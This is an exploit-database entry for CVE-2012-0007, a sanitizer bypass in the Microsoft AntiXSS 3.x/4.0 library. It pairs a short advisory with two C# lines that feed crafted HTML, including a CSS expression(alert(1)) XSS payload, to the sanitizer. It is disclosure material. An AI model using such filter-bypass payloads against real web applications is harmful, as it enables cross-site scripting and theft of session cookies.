[] NeoSense
E X P L O I T S
title author type platform port cve id

Microsoft AntiXSS 3/4.0 Library Sanitization Module - Security Bypass

Author: Adi Cohen
type: remote
platform: windows
port: 
date_added: 2012-01-10 
date_updated: 2015-03-27 
verified: 1 
codes: CVE-2012-0007;OSVDB-78208 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/51291/info

Microsoft Anti-Cross Site Scripting (AntiXSS) Library is prone to a security-bypass vulnerability that affects the sanitization module.

An attacker can exploit this vulnerability to bypass the filter and conduct cross-site scripting attacks. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials.

Microsoft Anti-Cross Site Scripting Library 3.x and 4.0 are vulnerable.

string data = Microsoft.Security.Application.Sanitizer.GetSafeHtml("a<style><!--div{font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'}--></style><div>b</div>");

string data = Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment("<div style="">aaa</div>")
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.